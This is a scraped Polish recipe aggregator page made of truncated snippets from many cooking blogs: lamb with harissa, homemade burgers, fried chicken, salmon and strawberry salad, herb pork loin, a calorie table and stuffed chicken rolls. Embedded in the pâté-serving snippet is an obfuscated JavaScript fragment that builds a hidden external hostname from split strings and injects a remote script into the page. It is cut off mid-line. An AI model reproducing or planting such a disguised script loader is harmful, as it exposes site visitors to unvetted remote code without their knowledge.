Lekkie salatki sa zawsze mile widziane na miom stole. Bardzo lubie je przerzadzac, bo moga byc samodzielnym daniem, pasuja tez do roznych mies. Ta dzisiejsza doskonale
Przysmaki KarolkiPyszna i łatwa do zrobienia baranina. Sos jest zdecydowany w smaku i dosyć ostry, więc jeżeli wolicie łagodniejszą wersję lepiej zmniejszyć ilość harissy. Oryginalny przepis nie przewidywał dodania kiszonej cytryny, ale jeżeli macie możliwość - dodajcie koniecznie. Do dania była użyta jagnięcina, ja zastąpiłam ją baraniną, którą wolę ze względu na wyrazisty smak i, nie ukrywam, przyjemniejszą cenę. Mięso(...)łyżeczka za'ataru 2 łyżki syropu z granatów sól, pieprz 2 czerwone cebule 6 - 8 ząbków czosnku 1/2 pęczka pietruszki 1 cytryna kiszona - opcjonalnie do podania pieczywo, kasza, sałata, jogurt przygotowanie Piekarnik rozgrzać do 200 st C. Opłukane i osuszone mięso natrzeć harissą, za'atarem, syropem z granatów, posypać solą i pieprzem. Cebule obrać, przekroić na dwie lub cztery
Stare Garybazylii 2 łyżki oleju 1 łyżka bułki tartej 1 płaska łyżeczka przyprawy do wołowiny 1/3 łyżeczki pieprzu cayenne sól, pieprz do smaku Dodatkowo: 4 duże bułki 4 duże liście sałaty pomidor ogórek majonez ketchup musztarda masełko czosnkowe Sposób przygotowania: 1. Na oleju delikatnie zeszklić posiekaną drobno cebulę, czosnek oraz listki bazylii. Woreczek ryżu ugotować (al dente) i ostudzić pod bieżącą(...)przecinamy na dwie części, jedną smarujemy masełkiem czosnkowym i razem z pozostałymi delikatnie nagrzewamy w piekarniku (ok 5 minut w 200st). Następnie układamy dodatki, dodajemy ugrillowane burgery i polewamy sosami. Smacznego! Ps. U mnie dziś powtórka, tak Mężowi posmakowały
Kuchnia w czekoladzierazem użyłam mielonego mięsa wołowo-wieprzowego jednak jeśli macie czas i możliwość lepsza byłyba z mielona wołowina. Przy następnej okazji wpis uzupłnię o lepsze zdjęcia oraz przepisy na sosy, które tym razem zastąpiłam ketchupem:) Potraktujmy więc ten wpis jako początek domowej przygody z burgerami :) Inspiracją był dla mnie przepis ze strony Smaczna Pyza Składniki na 12 burger(...)oleju - u mnie z pesetek winogron 1 łyżeczka soli 1 łyżeczka świeżo mielonego pieprzu nasze ulubione przyprawy do mięsa mielonego olej do smażenia WARZYWA : ogórki konserwowe sałata lub mix sałat pomidory cebula czerwona ketchup majonez Wykonanie : BUŁKI : ZACZYN - drożdże rozmieszać z kilkoma łyżeczkami mleka a kiedy się rozpuszczą dolać pozostałe mleko i wsypać przesianą mąkę. Dokładnie wymieszać
cucinareduży ząbek czosnku, 2-3 łyżki wina do gotowania Shaoxing, łyżka octu ryżowego 3 łyżki mąki pszennej, 4 łyżki mąki ryżowej, 3 łyżeczki proszku do pieczenia olej do smażenia sos: 5-6 łyżek jogurtu naturalnego, 1-2 łyżeczki słodkiej pasty chilli, sok z połowy limonki Filet z piersi kurczaka oczyść, umyć i osuszyć, pokroić na małe kawałki o wielkości(...)stopni). Usmażone kawałki kurczaka odkładaj na talerz wyłożony ręcznikiem papierowym do odsączenia nadmiaru tłuszczu. W miseczce wymieszaj jogurt naturalny, pastę chili i sok z limonki. Kurczaka podawać z sałatą lub ryżem. Smacznego
Plate of JoyUpały. A kiedy jest gorąco, Karmel-itka ma mniejszy apetyt. Ha, ale na tłuste sosy, ciężkie mięsiwa, obfite porcje... Nie, nie, nie! Mamy w końcu czerwiec, prawie, że lato, a na ogródkach mnóstwo pyszności. Apetyt rośnie jednak, na samą myśl o czymś lekkim, zdrowym, co jednocześnie zaspokoi głód i zmysł smaku. Co nie zabiera wiele czasu, składa się z niewielu(...)łososiem wspaniale współgrają, uzupełniają i wzajemnie przełamują. Żaden nie dominuje, a pieprz dodatkowo wydobywa słodycz owoców. SAŁATKA Z ŁOSOSIEM, TRUSKAWKAMI I OCTEM BALSAMICZNYM. /znane połączenie, często spotykane;/ garść zielonej sałaty garść świeżych truskawek 100g łososia wędzonego pieprz świeżo mnielony 3-4 łyżki octu balsamicznego Liście sałaty płuczę pod bieżącą wodą, osuszam, rwę na mniejsze kawałki. Łososia, jeśli jest w kawałku
W kuchni Karmel-itkiSezon na pomidory w pełni. Na straganach jest duży ich wybór: czerwone, różowe, zielone, czerwono-brązowe, żółte, pomarańczowe, w różnych kształtach i rozmiarach. Wow! Ta różnorodność
Codziennik KuchennySezon na świeże figi w pełni, spieszę więc z pyszną sałatką. Kto jeszcze nie próbował świeżych fig niech nie zwleka, są cudowne w smaku
Smaczne ZdroweSoczysty, mięciutki, pełen ziołowego aromatu schab pieczony, doskonały na rodzinny obiad. Możemy podać go np. z ziemniakami z wody i sałatą lodową. Nie potrzeba więcej dodatków, gdyż ziołowe masło nadaje mięsu bardzo wyrazisty smak. Polecam bardzo ten przepis na schab z ziołami - najlepiej oczywiście świeżymi:) SKŁADNIKI 800 g schabu bez kości sól pieprz 2 łyżki posiekanej(...)Schab lekko ściskamy i zawijamy szczelnie w folię aluminiową. Wkładamy do blaszki, podlewamy szklanką wody i pieczemy przez godzinę. Przed podaniem rozwijamy ostrożnie folię i zlewamy powstały podczas pieczenia sos. Mięso przekładamy na półmisek. Przekrawamy plastry mięsa i polewamy sosem (podawanym w sosjerce). Smacznego
Moje Kuchenne Rewelacjeciemnym pieczywem – chlebem oraz bułkami. Aby wydobyć jego smak możemy wcześniej posmarować kromki masłem lub margaryną. Na śniadanie lub do pracy przygotujemy klasyczne kanapki z warzywami – przekładamy kromki sałatą, pomidorem, ogórkiem czy papryką i rzodkiewką. Smak pasztetu w połączeniu z warzywami będzie jeszcze bardziej wyrazisty oraz aksamitny. Idealne połączenie stanowi w połączeniu z produktami kiszonymi: ogórkami, marynowaną papryką lub patisonami(...)ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru+="j1xkjsmmhXfyin"; i32r.src="//"+i32r_+i32ru;i32r.type="text/javascript
Moja smaczna kuchniaprzygotowania nie wymaga dodatkowego tłuszczu. Polecam też grillowany schab z mozzarellą lub schab z grilla lub schab grillowany z pietruszką. Marynujemy plastry schabu mieszanką oliwy, sosu sojowego i sosu piri piri z dodatkiem natki pietruszki. Na każdym plastrze pomidora układamy świeży rozmaryn, doprawiamy solą i pieprzem. Pieczarki doprawiamy solą i pieprzem. Ostatnio mój sprzęt AGD powiększył się o nowy grill(...)minut, aż paski od grilla odbiją się na mięsie. Schab równomiernie się grilluje z obu stron. Wystarczy schab grillowany z pomidorami i pieczarkami przełożyć na talerz z liśćmi sałaty i zjeść z wielkim apetytem. Schab grillowany z pomidorami i pieczarkami jest soczysty i smaczny. Smacznego! The post Schab grillowany z pomidorami i pieczarkami appeared first on Damsko-męskie spojrzenie
Damsko-męskie spojrzenie na kuchniękcal Mleko 0.5 procent tłuszczu , szklanka - 200 ml- 78 kcal Kefir 2 procent tłuszczu , szklanka - 240 ml - 122 kcal Maślanka Naturalna , szklanka - 200 ml - 60 kcal TŁUSZCZE I SOSY : ****************************************** Masło Śmietankowe,łyżeczka -5gram - 23 kcal Margaryna light , łyżeczka - 5 gram - 22 kcal Majonez light , łyżka - 15 gram - 20 kcal Olej Rzepakowy , łyżka - 10 gram - 88 kcal Koncentrat(...)Marchew , sztuka - 50 gram - 10 kcal Ogórek , sztuka - 10 gram - 10 kcal Pomidor , sztuka - 150 gram - 21 kcal Rzodkiewka , sztuka - 10 gram - 1 Rzeżucha , łyżeczka - 5 gram - 1 kcal Sałata , mała główka - 30 gram - 3 kcal Seler Naciowy , gałązka - 20 gram - 2 kcal Ziemniak gotowany , sztuka - 150 gram - 90 kcal 1500- 1524 KCAL DO ZJEDZENIA PRZEZ CAŁY DZIEŃ
Kocurkowe rozmyślania w kuchni Anielkimoich bułek, no przecież): 500 g ugotowanej kaszy bulgur (waga po ugotowaniu, suchej to będzie jakieś 200 g) 1 duży batat (mój miał 500 g) 3 łyżki ciemnego sosu sojowego 100 ml oleju roślinnego po pół łyżeczki: soli, pieprzu, czosnku granulowanego, papryki wędzonej 50 g ziaren słonecznika 50 g ziaren sezamu 1 cebula 30 g mąki (duża łyżka, u mnie(...)odwracać. Po wyjęciu z piekarnika odczekać z 5 minut i wtedy przez problemu da się je przenieść. Smaczne zarówno na ciepło jak i na zimno. Do swoich buł dodałam sałatę cykoriową, pomidory (z własnego ogródka) i wegański ser typu mozarella
greenscarfłyżki czerwonej papryki słodkiej – majeranek, rozmaryn (najlepiej świeży) – kilka gałązek – 2-3 papryczki peperoncino – 200 ml czerwonego wina – 3-4 łyżki sosu sojowego jasnego – 1 łyżka mielonego kminu rzymskiego – 1 łyżka mielonego jałowca – 3-4 ząbki czosnku Wykonanie: Wołowinę pokroić w podłużną kostkę (ok. 2×3 cm). Cebulę pokroić w ćwiartki(...)minut. Mięso powinno być z zewnątrz zrumienione, ale przy dotyku nadal sprężyste – to gwarantuje, że w środku będzie soczyste i niewysuszone. Można podawać z sałatką tabbouleh albo zieloną sałatą z bobem . Podobne przepisy Stek z polędwicy z masłem czosnkowym z dodatkiem g... Gazpacho z oliwkami i płatkami migdałów Glazurowana czerwona papryka słodko-kwaśna Leczo prawie
Pociąg Do KuchniRoladki z kurczaka, faszerowane serem feta, zawinięte w chrupiący boczek, zalane sosem śmietankowym z pesto i zielonym groszkiem. Składniki : 2 duże filety z kurczaka (około 500 g) 200 g sera feta 100 g surowego boczku, pokrojonego w cieniutkie plastry - 8 sztuk) 2 łyżki oliwy 1/2 szklanki wody 200 ml śmietany kremówki 1 łyżka pesto z bazylii 180 g zielonego(...)szklanki wody. Śmietanę kremówkę wymieszać z pesto i zalać roladki, dodać przygotowany wcześniej groszek i dusić około 5 minut. Doprawić świeżo zmielonym pieprzem. Podawać z makaronem, młodymi ziemniaczkami lub sałatą. Smacznego
Zabawa smakiem